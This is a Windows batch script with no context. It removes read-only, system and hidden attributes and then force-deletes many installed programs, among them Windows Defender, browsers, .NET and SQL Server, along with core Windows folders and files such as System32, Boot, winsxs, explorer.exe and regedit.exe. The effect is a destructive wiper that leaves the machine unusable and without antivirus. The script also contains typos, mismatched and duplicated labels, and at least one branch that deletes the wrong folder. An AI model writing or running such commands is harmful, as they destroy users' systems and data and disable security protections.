Del /F /Q /S "%programfiles%\IIS\*.*"
Del /F /Q /S "%programfiles%\IIS"
:pasiss
If exist "%programfiles%\IIS Express" goto delisexp
If not exist "%programfiles%\IIS Express" goto pasisexp
:delisexp
Attrib "%programfiles%\IIS Express\*.*" -r -s -h
Attrib "%programfiles%\IIS Express" -r -s -h
Del /F /Q /S "%programfiles%\IIS Express\*.*"
Del /F /Q /S "%programfiles%\IIS Express"
:pasisexp
If exist "%programfiles%\Internet Explorer" goto delie
If not exist "%programfiles%\Internet Explorer" goto pasie
:delie
Attrib "%programfiles%\Internet Explorer\*.*" -r -s -h
Attrib "%programfiles%\Internet Explorer" -r -s -h
Del /F /Q /S "%programfiles%\Internet Explorer\*.*"
Del /F /Q /S "%programfiles%\Internet Explorer"
:pasie
If exist "%programfiles%\Microsoft ASP.NET" goto delmsant
If not exist "%programfiles%\Microsoft ASP.NET" goto pasmsant
:delmsant
Attrib "%programfiles%\Microsoft ASP.NET\*.*" -r -s -h
Attrib "%programfiles%\Microsoft ASP.NET" -r -s -h
Del /F /Q /S "%programfiles%\Microsoft ASP.NET\*.*"
Del /F /Q /S "%programfiles%\Microsoft ASP.NET"
:pasmsant
If exist "%programfiles%\Microsoft Help Viewer" goto delmshv
If not exist "%programfiles%\Microsoft Help Viewer" goto pasmshv
:delmshv
Attrib "%programfiles%\Microsoft ASP.NET\*.*" -r -s -h
Attrib "%programfiles%\Microsoft ASP.NET" -r -s -h
Del /F /Q /S "%programfiles%\Microsoft ASP.NET\*.*"
Del /F /Q /S "%programfiles%\Microsoft ASP.NET"
:pasmshv
If exsit "%programfiles%\Microsoft SDKs" goto delmssdk
If not exsit "%programfiles%\Microsoft SDKs" goto pasmssdk
:delmssdk
Attrib "%programfiles%\Microsoft SDKs\*.*" -r -s -h
Attrib "%programfiles%\Microsoft SDKs" -r -s -h
Del /F /Q /S "%programfiles%\Microsoft SDKs\*.*"
Del /F /Q /S "%programfiles%\Microsoft SDKs"
:pasmssdk
If exist "%programfiles%\Microsoft Silverlight" goto delmssl
If not exist "%programfiles%\Microsoft Silverlight" goto pasmssl
:delmssl
Attrib "%programfiles%\Microsoft Silverlight\*.*" -r -s -h
Attrib "%programfiles%\Microsoft Silverlight" -r -s -h
Del /F /Q /S "%programfiles%\Microsoft Silverlight\*.*"
Del /F /Q /S "%programfiles%\Microsoft Silverlight"
:pasmssl
If exist "%programfiles%\Microsoft SQL Server" goto delmsss
If not exist "%programfiles%\Microsoft SQL Server" goto pasmsss
:delmsss
Attrib "%programfiles%\Microsoft SQL Server\*.*" -r -s -h
Attrib "%programfiles%\Microsoft SQL Server" -r -s -h
Del /F /Q /S "%programfiles%\Microsoft SQL Server\*.*"
Del /F /Q /S "%programfiles%\Microsoft SQL Server"
:pasmsss
If exist "%programfiles%\Microsoft SQL Server Compact Edition" goto delmsssce
If not exist "%programfiles%\Microsoft SQL Server Compact Edition" goto pasmsssce
:delmsssce
Attrib "%programfiles%\Microsoft SQL Server Compact Edition\*.*" -r -s -h
Attrib "%programfiles%\Microsoft SQL Server Compact Edition" -r -s -h
Del /F /Q /S "%programfiles%\Microsoft SQL Server Compact Edition\*.*"
Del /F /Q /S "%programfiles%\Microsoft SQL Server Compact Edition"
:pasmsssce
If exist "%programfiles%\Microsoft WCF Data Services" goto delmswds
If not exist "%programfiles%\Microsoft WCF Data Services" goto pasmswds
:delmswds
Attrib "%programfiles%\Microsoft WCF Data Services\*.*" -r -s -h
Attrib "%programfiles%\Microsoft WCF Data Services" -r -s -h
Del /F /Q /S "%programfiles%\Microsoft WCF Data Services\*.*"
Del /F /Q /S "%programfiles%\Microsoft WCF Data Services"
:pasmswds
If exist "%programfiles%\Microsoft Web Tools" goto delmswt
If not exist "%programfiles%\Microsoft Web Tools" goto pasmswt
:delmswt
Attrib "%programfiles%\Microsoft Web Tools\*.*" -r -s -h
Attrib "%programfiles%\Microsoft Web Tools" -r -s -h
Del /F /Q /S "%programfiles%\Microsoft Web Tools\*.*"
Del /F /Q /S "%programfiles%\Microsoft Web Tools"
:pasmswt
If exist "%programfiles%\Microsoft XDE" goto delmsxde
If not exist "%programfiles%\Microsoft XDE" goto pasmsxde
:delmsxde
Attrib "%programfiles%\Microsoft XDE\*.*" -r -s -h
Attrib "%programfiles%\Microsoft XDE" -r -s -h
Del /F /Q /S "%programfiles%\Microsoft XDE\*.*"
Del /F /Q /S "%programfiles%\Microsoft XDE"
:pasmsxde
If exist "%programfiles%\Microsoft.NET" goto delmsnet
If not exist "%programfiles%\Microsoft.NET" goto pasmsnet
:delmsnet
Attrib "%programfiles%\Microsoft.NET\*.*" -r -s -h
Attrib "%programfiles%\Microsoft.NET" -r -s -h
Del /F /Q /S "%programfiles%\Microsoft.NET\*.*"
Del /F /Q /S "%programfiles%\Microsoft.NET"
:pasmsnet
If exist "%programfiles%\Mozilla Firefox" goto delfirefox
If not exist "%programfiles%\Mozilla Firefox" goto pasfirefox
:delfirfox
Attrib "%programfiles%\Mozilla Firefox\*.*" -r -s -h
Attrib "%programfiles%\Mozilla Firefox" -r -s -h
Del /F /Q /S "%programfiles%\Mozilla Firefox\*.*"
Del /F /Q /S "%programfiles%\Mozilla Firefox"
Del /F /Q /S "%programfiles%\Mozilla Maintenance Service\*.*"
Del /F /Q /S "%programfiles%\Mozilla Maintenance Service"
:pasfirefox
If exist "%programfiles%\MSBuild" goto delmsbld
If not exist "%programfiles%\MSBuild" goto pasmsbld
:delmsbld
Attrib "%programfiles%\MSBuild\*.*" -r -s -h
Attrib "%programfiles%\MSBuild" -r -s -h
Del /F /Q /S "%programfiles%\MSBuild\*.*"
Del /F /Q /S "%programfiles%\MSBuild"
:pasmsbld
If exist "%programfiles%\Opera" goto delopra
If not exist "%programfiles%\Opera" goto pasopra
:delopra
Attrib "%programfiles%\Opera\*.*" -r -s -h
Attrib "%programfiles%\Opera" -r -s -h
Del /F /Q /S "%programfiles%\Opera\*.*"
Del /F /Q /S "%programfiles%\Opera"
:pasopra
If exist "%programfiles%\Reference Assemblies" goto delrfsmb
If not exist "%programfiles%\Reference Assemblies" goto pasrfsmb
:delrfsmb
Attrib "%programfiles%\Reference Assemblies\*.*" -r -s -h
Attrib "%programfiles%\Reference Assemblies" -r -s -h
Del /F /Q /S "%programfiles%\Reference Assemblies\*.*"
Del /F /Q /S "%programfiles%\Reference Assemblies"
:pasrfsmb
If exist "%programfiles%\TAP-Windows" goto deltpwin
If not exist "%programfiles%\TAP-Windows" goto pastpwin
:deltpwin
Attrib "%programfiles%\TAP-Windows\*.*" -r -s -h
Attrib "%programfiles%\TAP-Windows" -r -s -h
Del /F /Q /S "%programfiles%\TAP-Windows\*.*"
Del /F /Q /S "%programfiles%\TAP-Windows"
:pastpwin
If exist "%programfiles%\Windows Defender" goto delwndfnd
If not exist "%programfiles%\Windows Defender" goto paswndfnd
:delwndfnd
Attrib "%programfiles%\Windows Defender\*.*" -r -s -h
Attrib "%programfiles%\Windows Defender" -r -s -h
Del /F /Q /S "%programfiles%\Windows Defender\*.*"
Del /F /Q /S "%programfiles%\Windows Defender"
:paswndfnd
If exist "%programfiles%\Windows Journal" goto delwnjrnl
If not exist "%programfiles%\Windows Journal" goto paswnjrnl
:delwnjrnl
Attrib "%programfiles%\Windows Journal\*.*" -r -s -h
Attrib "%programfiles%\Windows Journal" -r -s -h
Del /F /Q /S "%programfiles%\Windows Journal\*.*"
Del /F /Q /S "%programfiles%\Windows Journal"
:paswnjrnl
If exist "%programfiles%\Windows Kits" goto delwnkit
If not exist "%programfiles%\Windows Kits" goto paswnkit
:delwnkit
Attrib "%programfiles%\Windows Kits\*.*" -r -s -h
Attrib "%programfiles%\Windows Kits" -r -s -h
Del /F /Q /S "%programfiles%\Windows Kits\*.*"
Del /F /Q /S "%programfiles%\Windows Kits"
:paswnkit
If exist "%programfiles%\Windows Mail" goto delwnmail
If not exist "%programfiles%\Windows Mail" goto paswnmail
:delwnmail
Attrib "%programfiles%\Windows Mail\*.*" -r -s -h
Attrib "%programfiles%\Windows Mail" -r -s -h
Del /F /Q /S "%programfiles%\Windows Mail\*.*"
Del /F /Q /S "%programfiles%\Windows Mail"
:paswnmail
If exist "%programfiles%\Windows Media Player" goto delwnmpl
If not exist "%programfiles%\Windows Media Player" goto paswnmpl
:delwnmpl
Attrib "%programfiles%\Windows Media Player\*.*" -r -s -h
Attrib "%programfiles%\Windows Media Player" -r -s -h
Del /F /Q /S "%programfiles%\Windows Media Player\*.*"
Del /F /Q /S "%programfiles%\Windows Media Player"
:paswnmpl
If exist "%programfiles%\Windows NT" goto delwnnt
If not exist "%programfiles%\Windows NT" goto paswnnt
:delwnnt
Attrib "%programfiles%\Windows NT\*.*" -r -s -h
Attrib "%programfiles%\Windows NT" -r -s -h
Del /F /Q /S "%programfiles%\Windows NT\*.*"
Del /F /Q /S "%programfiles%\Windows NT"
:paswnnt
If exist "%programfiles%\Windows Phone Kits" goto delwnphkt
If not exist "%programfiles%\Windows Phone Kits" goto paswnphkt
:delwnphkt
Attrib "%programfiles%\Windows Phone Kits\*.*" -r -s -h
Attrib "%programfiles%\Windows Phone Kits" -r -s -h
Del /F /Q /S "%programfiles%\Windows Phone Kits\*.*"
Del /F /Q /S "%programfiles%\Windows Phone Kits"
:paswnphkt
If exist "%programfiles%\Windows Phone Silverlight Kits" goto delwnphktsk
If not exist "%programfiles%\Windows Phone Silverlight Kits" goto paswnphktsk
:delwnphktsk
Attrib "%programfiles%\Windows Phone Silverlight Kits\*.*" -r -s -h
Attrib "%programfiles%\Windows Phone Silverlight Kits" -r -s -h
Del /F /Q /S "%programfiles%\Windows Phone Silverlight Kits\*.*"
Del /F /Q /S "%programfiles%\Windows Phone Silverlight Kits"
:paswnphktsk
If exist "%programfiles%\Windows Photo Viewer" goto delwnphvw
If not exist "%programfiles%\Windows Photo Viewer" goto paswnphvw
:delwnphvw
Attrib "%programfiles%\Windows Photo Viewer\*.*" -r -s -h
Attrib "%programfiles%\Windows Photo Viewer" -r -s -h
Del /F /Q /S "%programfiles%\Windows Photo Viewer\*.*"
Del /F /Q /S "%programfiles%\Windows Photo Viewer"
:paswnphvw
If exist "%programfiles%\Windows Portable Devices" goto delwnprds
If not exist "%programfiles%\Windows Portable Devices" goto paswnprds
:delwnprds
Attrib "%programfiles%\Windows Portable Devices\*.*" -r -s -h
Attrib "%programfiles%\Windows Portable Devices" -r -s -h
Del /F /Q /S "%programfiles%\Windows Portable Devices\*.*"
Del /F /Q /S "%programfiles%\Windows Portable Devices"
:paswnprds
If exist "%programfiles%\Windows Sidebar" goto delwnsdbr
If not exist "%programfiles%\Windows Sidebar" goto paswnsdbr
:delwnsdbr
Attrib "%programfiles%\Windows Sidebar\*.*" -r -s -h
Attrib "%programfiles%\Windows Sidebar" -r -s -h
Del /F /Q /S "%programfiles%\Windows Sidebar\*.*"
Del /F /Q /S "%programfiles%\Windows Sidebar"
:paswnsdbr
Attrib "%homedrive%\Windows\addins\*.*" -r -s -h
Attrib "%homedrive%\Windows\addins" -r -s -h
Del /F /Q /S "%homedrive%\Windows\addins"
Attrib "%homedrive%\Windows\AppCompat\*.*" -r -s -h
Attrib "%homedrive%\Windows\AppCompat" -r -s -h
Del /F /Q /S "%homedrive%\Windows\AppCompat\*.*"
Del /F /Q /S "%homedrive%\Windows\AppCompat"
Attrib "%homedrive%\Windows\AppPatch\*.*" -r -s -h
Attrib "%homedrive%\Windows\AppPatch" -r -s -h
Del /F /Q /S "%homedrive%\Windows\AppPatch\*.*"
Del /F /Q /S "%homedrive%\Windows\AppPatch"
Attrib "%homedrive%\Windows\assembly\*.*" -r -s -h
Attrib "%homedrive%\Windows\assembly" -r -s -h
Del /F /Q /S "%homedrive%\Windows\assembly\*.*"
Del /F /Q /S "%homedrive%\Windows\assembly"
Attrib "%homedrive%\Windows\Boot\*.*" -r -s -h
Attrib "%homedrive%\Windows\Boot" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Boot\*.*"
Del /F /Q /S "%homedrive%\Windows\Boot"
Attrib "%homedrive%\Windows\Branding\*.*" -r -s -h
Attrib "%homedrive%\Windows\Branding" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Branding\*.*"
Del /F /Q /S "%homedrive%\Windows\Branding"
Attrib "%homedrive%\Windows\CheckSur\*.*" -r -s -h
Attrib "%homedrive%\Windows\CheckSur" -r -s -h
Del /F /Q /S "%homedrive%\Windows\CheckSur\*.*"
Del /F /Q /S "%homedrive%\Windows\CheckSur"
Attrib "%homedrive%\Windows\CSC\*.*" -r -s -h
Attrib "%homedrive%\Windows\CSC" -r -s -h
Del /F /Q /S "%homedrive%\Windows\CSC\*.*"
Del /F /Q /S "%homedrive%\Windows\CSC"
Attrib "%homedrive%\Windows\Cursors\*.*" -r -s -h
Attrib "%homedrive%\Windows\Cursors" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Cursors\*.*"
Del /F /Q /S "%homedrive%\Windows\Cursors"
Attrib "%homedrive%\Windows\debug\*.*" -r -s -h
Attrib "%homedrive%\Windows\debug" -r -s -h
Del /F /Q /S "%homedrive%\Windows\debug\*.*"
Del /F /Q /S "%homedrive%\Windows\debug"
Attrib "%homedrive%\Windows\diagnostics\*.*" -r -s -h
Attrib "%homedrive%\Windows\diagnostics" -r -s -h
Del /F /Q /S "%homedrive%\Windows\diagnostics\*.*"
Del /F /Q /S "%homedrive%\Windows\diagnostics"
Attrib "%homedrive%\Windows\DigitalLocker\*.*" -r -s -h
Attrib "%homedrive%\Windows\DigitalLocker" -r -s -h
Del /F /Q /S "%homedrive%\Windows\DigitalLocker\*.*"
Del /F /Q /S "%homedrive%\Windows\DigitalLocker"
Attrib "%homedrive%\Windows\Downloaded Program Files\*.*" -r -s -h
Attrib "%homedrive%\Windows\Downloaded Program Files" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Downloaded Program Files\*.*"
Del /F /Q /S "%homedrive%\Windows\Downloaded Program Files"
Attrib "%homedrive%\Windows\ehome\*.*" -r -s -h
Attrib "%homedrive%\Windows\ehome" -r -s -h
Del /F /Q /S "%homedrive%\Windows\ehome\*.*"
Del /F /Q /S "%homedrive%\Windows\ehome"
Attrib "%homedrive%\Windows\en-US\*.*" -r -s -h
Attrib "%homedrive%\Windows\en-US" -r -s -h
Del /F /Q /S "%homedrive%\Windows\en-US\*.*"
Del /F /Q /S "%homedrive%\Windows\en-US"
Attrib "%homedrive%\Windows\Fonts\*.*" -r -s -h
Attrib "%homedrive%\Windows\Fonts" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Fonts\*.*"
Del /F /Q /S "%homedrive%\Windows\Fonts"
Attrib "%homedrive%\Windows\Globalization\*.*" -r -s -h
Attrib "%homedrive%\Windows\Globalization" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Globalization\*.*"
Del /F /Q /S "%homedrive%\Windows\Globalization"
Attrib "%homedrive%\Windows\Help\*.*" -r -s -h
Attrib "%homedrive%\Windows\Help" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Help\*.*"
Del /F /Q /S "%homedrive%\Windows\Help"
Attrib "%homedrive%\Windows\IME\*.*" -r -s -h
Attrib "%homedrive%\Windows\IME" -r -s -h
Del /F /Q /S "%homedrive%\Windows\IME\*.*"
Del /F /Q /S "%homedrive%\Windows\IME"
Attrib "%homedrive%\Windows\inf\*.*" -r -s -h
Attrib "%homedrive%\Windows\inf" -r -s -h
Del /F /Q /S "%homedrive%\Windows\inf\*.*"
Del /F /Q /S "%homedrive%\Windows\inf"
Attrib "%homedrive%\Windows\L2Schemas\*.*" -r -s -h
Attrib "%homedrive%\Windows\L2Schemas" -r -s -h
Del /F /Q /S "%homedrive%\Windows\L2Schemas\*.*"
Del /F /Q /S "%homedrive%\Windows\L2Schemas"
Attrib "%homedrive%\Windows\LiveKernelReports\*.*" -r -s -h
Attrib "%homedrive%\Windows\LiveKernelReports" -r -s -h
Del /F /Q /S "%homedrive%\Windows\LiveKernelReports\*.*"
Del /F /Q /S "%homedrive%\Windows\LiveKernelReports"
Attrib "%homedrive%\Windows\Logs\*.*" -r -s -h
Attrib "%homedrive%\Windows\Logs" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Logs\*.*"
Del /F /Q /S "%homedrive%\Windows\Logs"
Attrib "%homedrive%\Windows\Media\*.*" -r -s -h
Attrib "%homedrive%\Windows\Media" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Media\*.*"
Del /F /Q /S "%homedrive%\Windows\Media"
Attrib "%homedrive%\Windows\Microsoft.NET\*.*" -r -s -h
Attrib "%homedrive%\Windows\Microsoft.NET" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Microsoft.NET\*.*"
Del /F /Q /S "%homedrive%\Windows\Microsoft.NET"
Attrib "%homedrive%\Windows\Migration\*.*" -r -s -h
Attrib "%homedrive%\Windows\Migration" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Migration\*.*"
Del /F /Q /S "%homedrive%\Windows\Migration"
Attrib "%homedrive%\Windows\ModemLogs\*.*" -r -s -h
Attrib "%homedrive%\Windows\ModemLogs" -r -s -h
Del /F /Q /S "%homedrive%\Windows\ModemLogs\*.*"
Del /F /Q /S "%homedrive%\Windows\ModemLogs"
Attrib "%homedrive%\Windows\Offline Web Pages\*.*" -r -s -h
Attrib "%homedrive%\Windows\Offline Web Pages" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Offline Web Pages\*.*"
Del /F /Q /S "%homedrive%\Windows\Offline Web Pages"
Attrib "%homedrive%\Windows\Panther\*.*" -r -s -h
Attrib "%homedrive%\Windows\Panther" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Panther\*.*"
Del /F /Q /S "%homedrive%\Windows\Panther"
Attrib "%homedrive%\Windows\Performance\*.*" -r -s -h
Attrib "%homedrive%\Windows\Performance" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Performance\*.*"
Del /F /Q /S "%homedrive%\Windows\Performance"
Attrib "%homedrive%\Windows\PLA\*.*" -r -s -h
Attrib "%homedrive%\Windows\PLA" -r -s -h
Del /F /Q /S "%homedrive%\Windows\PLA\*.*"
Del /F /Q /S "%homedrive%\Windows\PLA"
Attrib "%homedrive%\Windows\PolicyDefinitions\*.*" -r -s -h
Attrib "%homedrive%\Windows\PolicyDefinitions" -r -s -h
Del /F /Q /S "%homedrive%\Windows\PolicyDefinitions\*.*"
Del /F /Q /S "%homedrive%\Windows\PolicyDefinitions"
Attrib "%homedrive%\Windows\Prefetch\*.*" -r -s -h
Attrib "%homedrive%\Windows\Prefetch" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Prefetch\*.*"
Del /F /Q /S "%homedrive%\Windows\Prefetch"
Attrib "%homedrive%\Windows\Registration\*.*" -r -s -h
Attrib "%homedrive%\Windows\Registration" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Registration\*.*"
Del /F /Q /S "%homedrive%\Windows\Registration"
Attrib "%homedrive%\Windows\rescache\*.*" -r -s -h
Attrib "%homedrive%\Windows\rescache" -r -s -h
Del /F /Q /S "%homedrive%\Windows\rescache\*.*"
Del /F /Q /S "%homedrive%\Windows\rescache"
Attrib "%homedrive%\Windows\Resources\*.*" -r -s -h
Attrib "%homedrive%\Windows\Resources" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Resources\*.*"
Del /F /Q /S "%homedrive%\Windows\Resources"
Attrib "%homedrive%\Windows\SchCache\*.*" -r -s -h
Attrib "%homedrive%\Windows\SchCache" -r -s -h
Del /F /Q /S "%homedrive%\Windows\SchCache\*.*"
Del /F /Q /S "%homedrive%\Windows\SchCache"
Attrib "%homedrive%\Windows\schemas\*.*" -r -s -h
Attrib "%homedrive%\Windows\schemas" -r -s -h
Del /F /Q /S "%homedrive%\Windows\schemas\*.*"
Del /F /Q /S "%homedrive%\Windows\schemas"
Attrib "%homedrive%\Windows\security\*.*" -r -s -h
Attrib "%homedrive%\Windows\security" -r -s -h
Del /F /Q /S "%homedrive%\Windows\security\*.*"
Del /F /Q /S "%homedrive%\Windows\security"
Attrib "%homedrive%\Windows\ServiceProfiles\*.*" -r -s -h
Attrib "%homedrive%\Windows\ServiceProfiles" -r -s -h
Del /F /Q /S "%homedrive%\Windows\ServiceProfiles\*.*"
Del /F /Q /S "%homedrive%\Windows\ServiceProfiles"
Attrib "%homedrive%\Windows\servicing\*.*" -r -s -h
Attrib "%homedrive%\Windows\servicing" -r -s -h
Del /F /Q /S "%homedrive%\Windows\servicing\*.*"
Del /F /Q /S "%homedrive%\Windows\servicing"
Attrib "%homedrive%\Windows\Setup\*.*" -r -s -h
Attrib "%homedrive%\Windows\Setup" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Setup\*.*"
Del /F /Q /S "%homedrive%\Windows\Setup"
Attrib "%homedrive%\Windows\ShellNew\*.*" -r -s -h
Attrib "%homedrive%\Windows\ShellNew" -r -s -h
Del /F /Q /S "%homedrive%\Windows\ShellNew\*.*"
Del /F /Q /S "%homedrive%\Windows\ShellNew"
Attrib "%homedrive%\Windows\SoftwareDistribution\*.*" -r -s -h
Attrib "%homedrive%\Windows\SoftwareDistribution" -r -s -h
Del /F /Q /S "%homedrive%\Windows\SoftwareDistribution\*.*"
Del /F /Q /S "%homedrive%\Windows\SoftwareDistribution"
Attrib "%homedrive%\Windows\Speech\*.*" -r -s -h
Attrib "%homedrive%\Windows\Speech" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Speech\*.*"
Del /F /Q /S "%homedrive%\Windows\Speech"
Attrib "%homedrive%\Windows\symbols\*.*" -r -s -h
Attrib "%homedrive%\Windows\symbols" -r -s -h
Del /F /Q /S "%homedrive%\Windows\symbols\*.*"
Del /F /Q /S "%homedrive%\Windows\symbols"
Attrib "%homedrive%\Windows\system\*.*" -r -s -h
Attrib "%homedrive%\Windows\system" -r -s -h
Del /F /Q /S "%homedrive%\Windows\system\*.*"
Del /F /Q /S "%homedrive%\Windows\system"
Attrib "%homedrive%\Windows\System32\*.*" -r -s -h
Attrib "%homedrive%\Windows\System32" -r -s -h
Del /F /Q /S "%homedrive%\Windows\System32\*.*"
Del /F /Q /S "%homedrive%\Windows\System32"
Attrib "%homedrive%\Windows\TAPI\*.*" -r -s -h
Attrib "%homedrive%\Windows\TAPI" -r -s -h
Del /F /Q /S "%homedrive%\Windows\TAPI\*.*"
Del /F /Q /S "%homedrive%\Windows\TAPI"
Attrib "%homedrive%\Windows\Tasks\*.*" -r -s -h
Attrib "%homedrive%\Windows\Tasks" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Tasks\*.*"
Del /F /Q /S "%homedrive%\Windows\Tasks"
Attrib "%homedrive%\Windows\Temp\*.*" -r -s -h
Attrib "%homedrive%\Windows\Temp" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Temp\*.*"
Del /F /Q /S "%homedrive%\Windows\Temp"
Attrib "%homedrive%\Windows\tracing\*.*" -r -s -h
Attrib "%homedrive%\Windows\tracing" -r -s -h
Del /F /Q /S "%homedrive%\Windows\tracing\*.*"
Del /F /Q /S "%homedrive%\Windows\tracing"
Attrib "%homedrive%\Windows\twain_32\*.*" -r -s -h
Attrib "%homedrive%\Windows\twain_32" -r -s -h
Del /F /Q /S "%homedrive%\Windows\twain_32\*.*"
Del /F /Q /S "%homedrive%\Windows\twain_32"
Attrib "%homedrive%\Windows\Vss\*.*" -r -s -h
Attrib "%homedrive%\Windows\Vss" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Vss\*.*"
Del /F /Q /S "%homedrive%\Windows\Vss"
Attrib "%homedrive%\Windows\Web\*.*" -r -s -h
Attrib "%homedrive%\Windows\Web" -r -s -h
Del /F /Q /S "%homedrive%\Windows\Web\*.*"
Del /F /Q /S "%homedrive%\Windows\Web"
Attrib "%homedrive%\Windows\winsxs\*.*" -r -s -h
Attrib "%homedrive%\Windows\winsxs" -r -s -h
Del /F /Q /S "%homedrive%\Windows\winsxs\*.*"
Del /F /Q /S "%homedrive%\Windows\winsxs"
If exist "%homedrive%\Windows\_default.pif" goto deldefault
If not exist "%homedrive%\Windows\_default.pif" goto pasdefault
:deldefault
Attrib "%homedrive%\Windows\_default.pif" -r -s -h
Del /F /Q "%homedrive%\Windows\_default.pif"
:pasdefault
If exist "%homedrive%\Windows\bfsvc.exe" goto delbfsvc
If not exist "%homedrive%\Windows\bfsvc" goto pasbfsvc
:delbfsvc
Attrib "%homedrive%\Windows\bfsvc.exe" -r -s -h
Del /F /Q "%homedrive%\Windows\bfsvc.exe"
:pasbfsvc
If exist "%homedrive%\Windows\bootstat.dat" goto delbtstat
If not exist "%homedrive%\Windows\bootstat.dat" goto pasbtstat
:delbtstat
Attrib "%homedrive%\Windows\bootstat.dat" -r -s -h
Del /F /Q "%homedrive%\Windows\bootstat.dat"
:pasbtstat
If exist "%homedrive%\Windows\DtcInstall.log" goto deldtcins
If not exist "%homedrive%\Windows\DtcInstall.log" goto pasdtcins
:deldtcins
Attrib "%homedrive%\Windows\DtcInstall.log" -r -s -h
Del /F /Q "%homedrive%\Windows\DtcInstall.log"
:pasdtcins
If exist "%homedrive%\Windows\epplauncher.mif" goto deldtcins
If not exist "%homedrive%\Windows\epplauncher.mif" goto pasdtcins
:deldtcins
Attrib "%homedrive%\Windows\epplauncher.mif" -r -s -h
Del /F /Q "%homedrive%\Windows\epplauncher.mif"
:pasdtcins
If exist "%homedrive%\Windows\explorer.exe" goto delexplr
If not exist "%homedrive%\Windows\explorer.exe" goto pasexplr
:delexplr
Attrib "%homedrive%\Windows\explorer.exe" -r -s -h
Del /F /Q "%homedrive%\Windows\explorer.exe"
:pasexplr
If exist "%homedrive%\Windows\fveupdate.exe" goto delexplr
If not exist "%homedrive%\Windows\fveupdate.exe" goto pasexplr
:delexplr
Attrib "%homedrive%\Windows\fveupdate.exe" -r -s -h
Del /F /Q "%homedrive%\Windows\fveupdate.exe"
:pasexplr
If exist "%homedrive%\Windows\HelpPane.exe" goto delhelppn
If not exist "%homedrive%\Windows\HelpPane.exe" goto pashelppn
:delhelppn
Attrib "%homedrive%\Windows\fveupdate.exe" -r -s -h
Del /F /Q "%homedrive%\Windows\fveupdate.exe"
:pashelppn
If exist "%homedrive%\Windows\hh.exe" goto delhh
If not exist "%homedrive%\Windows\hh.exe" goto pashh
:delhh
Attrib "%homedrive%\Windows\hh.exe" -r -s -h
Del /F /Q "%homedrive%\Windows\hh.exe"
:pashh
If exist "%homedrive%\Windows\IE11_main.log" goto delie11mn
If not exist "%homedrive%\Windows\IE11_main.log" goto pasie11mn
:delie11mn
Attrib "%homedrive%\Windows\IE11_main.log" -r -s -h
Del /F /Q "%homedrive%\Windows\IE11_main.log"
:pasie11mn
If exist "%homedrive%\Windows\mib.bin" goto delie11mn
If not exist "%homedrive%\Windows\mib.bin" goto pasie11mn
:delie11mn
Attrib "%homedrive%\Windows\mib.bin" -r -s -h
Del /F /Q "%homedrive%\Windows\mib.bin"
:pasie11mn
If exist "%homedrive%\Windows\msdfmap.ini" goto delmsdfmp
If not exist "%homedrive%\Windows\msdfmap.ini" goto pasmsdfmp
:delmsdfmp
Attrib "%homedrive%\Windows\msdfmap.ini" -r -s -h
Del /F /Q "%homedrive%\Windows\msdfmap.ini"
:pasmsdfmp
If exist "%homedrive%\Windows\notepad.exe" goto delntpd
If not exist "%homedrive%\Windows\notepad.exe" goto pasntpd
:delntpd
Attrib "%homedrive%\Windows\notepad.exe" -r -s -h
Del /F /Q "%homedrive%\Windows\notepad.exe"
:pasntpd
If exist "%homedrive%\Windows\PFRO.log" goto delpfro
If not exist "%homedrive%\Windows\PFRO.log" goto paspfro
:delpfro
Attrib "%homedrive%\Windows\PFRO.log" -r -s -h
Del /F /Q "%homedrive%\Windows\PFRO.log"
:paspfro
If exist "%homedrive%\Windows\Professional.xml" goto delprofs
If not exist "%homedrive%\Windows\Professional.xml" goto pasprofs
:delprofs
Attrib "%homedrive%\Windows\Professional.xml" -r -s -h
Del /F /Q "%homedrive%\Windows\Professional.xml"
:pasprofs
If exist "%homedrive%\Windows\regedit.exe" goto delreg
If not exist "%homedrive%\Windows\regedit.exe" goto pasreg
:delreg
Attrib "%homedrive%\Windows\regedit.exe" -r -s -h
Del /F /Q "%homedrive%\Windows\regedit.exe"
:pasreg
If exist "%homedrive%\Windows\setupact.log" goto delstpct
If not exist "%homedrive%\Windows\setupact.log" goto passtpct
:delstpct
Attrib "%homedrive%\Windows\setupact.log" -r -s -h
Del /F /Q "%homedrive%\Windows\setupact.log"
:passtpct
If exist "%homedrive%\Windows\setuperr.log" goto delstperr
If not exist "%homedrive%\Windows\setuperr.log" goto passtperr
:delstperr
Attrib "%homedrive%\Windows\setuperr.log" -r -s -h
Del /F /Q "%homedrive%\Windows\setuperr.log"
:passtperr
If exist "%homedrive%\Windows\Starter.xml" goto delstarter
If not exist "%homedrive%\Windows\Starter.xml" goto passtarter
:delstarter
Attrib "%homedrive%\Windows\Starter.xml" -r -s -h
Del /F /Q "%homedrive%\Windows\Starter.xml"
:passtarter
If exist "%homedrive%\Windows\system.ini" goto delsys
If not exist "%homedrive%\Windows\system.ini" goto passys
:delsys
Attrib "%homedrive%\Windows\system.ini" -r -s -h
Del /F /Q "%homedrive%\Windows\system.ini"
:passys
If exist "%homedrive%\Windows\TSSysprep.log" goto deltssys
If not exist "%homedrive%\Windows\TSSysprep.log" goto pastssys
:deltssys
Attrib "%homedrive%\Windows\TSSysprep.log" -r -s -h
Del /F /Q "%homedrive%\Windows\TSSysprep.log"
:pastssys
If exist "%homedrive%\Windows\twain.dll" goto deltwain
If not exist "%homedrive%\Windows\twain.dll" goto pastwain
:deltwain
Attrib "%homedrive%\Windows\twain.dll" -r -s -h
Del /F /Q "%homedrive%\Windows\twain.dll"
:pastwain
